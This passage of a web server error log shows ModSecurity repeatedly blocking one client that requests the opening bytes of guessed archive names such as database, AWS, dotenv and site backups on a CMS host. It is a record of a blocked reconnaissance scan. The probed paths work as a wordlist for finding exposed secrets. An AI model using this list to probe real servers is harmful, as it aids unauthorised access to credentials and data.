"OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/backup_2026.zip"] [unique_id "aa2sJ5q2Bzew8vjPgCG-cwAAAYg"] [Sun Mar 08 19:04:39.791729 2026] [:error] [pid 13471:tid 13484] [client 35.189.151.148:60562] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/wordpress-files.zip"] [unique_id "aa2sJ78gLDtA4xTIJqD4EwAAAAk"] [Sun Mar 08 19:04:39.791847 2026] [:error] [pid 13471:tid 13479] [client 35.189.151.148:41850] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/database_export.zip"] [unique_id "aa2sJ78gLDtA4xTIJqD4FAAAAAQ"] [Sun Mar 08 19:04:39.791930 2026] [:error] [pid 13605:tid 13617] [client 35.189.151.148:39086] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/aws-ec2.zip"] [unique_id "aa2sJzLobmDOvyRcAEhfqQAAAMo"] [Sun Mar 08 19:04:39.791999 2026] [:error] [pid 13472:tid 13512] [client 35.189.151.148:40732] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/aws-prod.zip"] [unique_id "aa2sJ13UyizU6P-l0YL85wAAAEk"] [Sun Mar 08 19:04:39.792083 2026] [:error] [pid 11078:tid 11117] [client 35.189.151.148:43310] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/aws-parameterstore.zip"] [unique_id "aa2sJ3-dmvIeGeY060kipQAAAcc"] [Sun Mar 08 19:04:39.792272 2026] [:error] [pid 13471:tid 13477] [client 35.189.151.148:41006] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/back.zip"] [unique_id "aa2sJ78gLDtA4xTIJqD4FQAAAAI"] [Sun Mar 08 19:04:39.792298 2026] [:error] [pid 11078:tid 11126] [client 35.189.151.148:39020] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/backups.zip"] [unique_id "aa2sJ3-dmvIeGeY060kipwAAAdA"] [Sun Mar 08 19:04:39.792397 2026] [:error] [pid 11078:tid 11116] [client 35.189.151.148:38516] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/dec.zip"] [unique_id "aa2sJ3-dmvIeGeY060kipgAAAcY"] [Sun Mar 08 19:04:39.792615 2026] [:error] [pid 11078:tid 11133] [client 35.189.151.148:38898] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/www_backup.zip"] [unique_id "aa2sJ3-dmvIeGeY060kipAAAAdc"] [Sun Mar 08 19:04:39.792657 2026] [:error] [pid 11078:tid 11115] [client 35.189.151.148:38284] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/public-html.zip"] [unique_id "aa2sJ3-dmvIeGeY060kiqAAAAcU"] [Sun Mar 08 19:04:39.793046 2026] [:error] [pid 13473:tid 13548] [client 35.189.151.148:43470] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/aws-stack-backup.zip"] [unique_id "aa2sJ0wwZGElJGd8aN_6IgAAAJM"] [Sun Mar 08 19:04:39.793164 2026] [:error] [pid 13472:tid 13519] [client 35.189.151.148:39896] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/site-files.zip"] [unique_id "aa2sJ13UyizU6P-l0YL86AAAAE0"] [Sun Mar 08 19:04:39.793464 2026] [:error] [pid 13472:tid 13532] [client 35.189.151.148:38246] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/directadmin.zip"] [unique_id "aa2sJ13UyizU6P-l0YL86QAAAFM"] [Sun Mar 08 19:04:39.793512 2026] [:error] [pid 13472:tid 13544] [client 35.189.151.148:37418] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/mar.zip"] [unique_id "aa2sJ13UyizU6P-l0YL86gAAAFg"] [Sun Mar 08 19:04:39.793543 2026] [:error] [pid 13472:tid 13502] [client 35.189.151.148:40464] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/aws-private.zip"] [unique_id "aa2sJ13UyizU6P-l0YL87AAAAEA"] [Sun Mar 08 19:04:39.793566 2026] [:error] [pid 13472:tid 13530] [client 35.189.151.148:41290] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/jan.zip"] [unique_id "aa2sJ13UyizU6P-l0YL86wAAAFI"] [Sun Mar 08 19:04:39.793584 2026] [:error] [pid 13472:tid 13517] [client 35.189.151.148:42896] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/september.zip"] [unique_id "aa2sJ13UyizU6P-l0YL87QAAAEw"] [Sun Mar 08 19:04:39.793617 2026] [:error] [pid 13605:tid 13619] [client 35.189.151.148:42934] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/backup_site.zip"] [unique_id "aa2sJzLobmDOvyRcAEhfqgAAAMw"] [Sun Mar 08 19:04:39.793635 2026] [:error] [pid 13471:tid 13476] [client 35.189.151.148:43910] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/icon_files.zip"] [unique_id "aa2sJ78gLDtA4xTIJqD4FgAAAAE"] [Sun Mar 08 19:04:39.793816 2026] [:error] [pid 13472:tid 13541] [client 35.189.151.148:44026] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/june.zip"] [unique_id "aa2sJ13UyizU6P-l0YL87gAAAFc"] [Sun Mar 08 19:04:39.793953 2026] [:error] [pid 13605:tid 13625] [client 35.189.151.148:37802] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/backup-10.zip"] [unique_id "aa2sJzLobmDOvyRcAEhfqwAAANI"] [Sun Mar 08 19:04:39.794006 2026] [:error] [pid 13471:tid 13491] [client 35.189.151.148:40446] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/sql_backup.zip"] [unique_id "aa2sJ78gLDtA4xTIJqD4FwAAABA"] [Sun Mar 08 19:04:39.794014 2026] [:error] [pid 12902:tid 12937] [client 35.189.151.148:41018] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/mail.zip"] [unique_id "aa2sJ2aTUOdovAC89_RAtAAAAoI"] [Sun Mar 08 19:04:39.794079 2026] [:error] [pid 13471:tid 13481] [client 35.189.151.148:41020] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/postgres.zip"] [unique_id "aa2sJ78gLDtA4xTIJqD4GAAAAAY"] [Sun Mar 08 19:04:39.794376 2026] [:error] [pid 13471:tid 13486] [client 35.189.151.148:43136] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/aws_snapshots.zip"] [unique_id "aa2sJ78gLDtA4xTIJqD4GgAAAAs"] [Sun Mar 08 19:04:39.794389 2026] [:error] [pid 13471:tid 13488] [client 35.189.151.148:41622] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/legacy.zip"] [unique_id "aa2sJ78gLDtA4xTIJqD4GQAAAA0"] [Sun Mar 08 19:04:39.794950 2026] [:error] [pid 13471:tid 13484] [client 35.189.151.148:39538] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/uploads.zip"] [unique_id "aa2sJ78gLDtA4xTIJqD4HAAAAAk"] [Sun Mar 08 19:04:39.795002 2026] [:error] [pid 13472:tid 13513] [client 35.189.151.148:42740] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/static_files.zip"] [unique_id "aa2sJ13UyizU6P-l0YL88AAAAEo"] [Sun Mar 08 19:04:39.795007 2026] [:error] [pid 13472:tid 13511] [client 35.189.151.148:38108] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/update_package.zip"] [unique_id "aa2sJ13UyizU6P-l0YL88QAAAEg"] [Sun Mar 08 19:04:39.795017 2026] [:error] [pid 13472:tid 13535] [client 35.189.151.148:40456] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/wp-files.zip"] [unique_id "aa2sJ13UyizU6P-l0YL87wAAAFQ"] [Sun Mar 08 19:04:39.795029 2026] [:error] [pid 13473:tid 13550] [client 35.189.151.148:44352] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/aws_lambda_code.zip"] [unique_id "aa2sJ0wwZGElJGd8aN_6IwAAAJU"] [Sun Mar 08 19:04:39.795043 2026] [:error] [pid 12902:tid 12954] [client 35.189.151.148:38442] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/temporary.zip"] [unique_id "aa2sJ2aTUOdovAC89_RAtQAAApM"] [Sun Mar 08 19:04:39.795119 2026] [:error] [pid 13471:tid 13496] [client 35.189.151.148:44040] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/uat.zip"] [unique_id "aa2sJ78gLDtA4xTIJqD4GwAAABU"] [Sun Mar 08 19:04:39.795142 2026] [:error] [pid 13472:tid 13505] [client 35.189.151.148:39714] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/ini.zip"] [unique_id "aa2sJ13UyizU6P-l0YL88gAAAEM"] [Sun Mar 08 19:04:39.795250 2026] [:error] [pid 13473:tid 13545] [client 35.189.151.148:37668] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/backup-02.zip"] [unique_id "aa2sJ0wwZGElJGd8aN_6JAAAAJE"] [Sun Mar 08 19:04:39.795291 2026] [:error] [pid 13471:tid 13495] [client 35.189.151.148:43430] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/user_data.zip"] [unique_id "aa2sJ78gLDtA4xTIJqD4HQAAABQ"] [Sun Mar 08 19:04:39.795303 2026] [:error] [pid 13471:tid 13493] [client 35.189.151.148:38254] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/dotenv.zip"] [unique_id "aa2sJ78gLDtA4xTIJqD4IAAAABI"] [Sun Mar 08 19:04:39.795308 2026] [:error] [pid 13471:tid 13485] [client 35.189.151.148:43680] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/auth.zip"] [unique_id "aa2sJ78gLDtA4xTIJqD4HwAAAAo"] [Sun Mar 08 19:04:39.795314 2026] [:error] [pid 13471:tid 13499] [client 35.189.151.148:40278] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/web-backup.zip"] [unique_id "aa2sJ78gLDtA4xTIJqD4HgAAABg"] [Sun Mar 08 19:04:39.795320 2026] [:error] [pid 12902:tid 12943] [client 35.189.151.148:40120] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/aws_buckets.zip"] [unique_id "aa2sJ2aTUOdovAC89_RAtgAAAog"] [Sun Mar 08 19:04:39.795528 2026] [:error] [pid 13471:tid 13487] [client 35.189.151.148:40860] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag 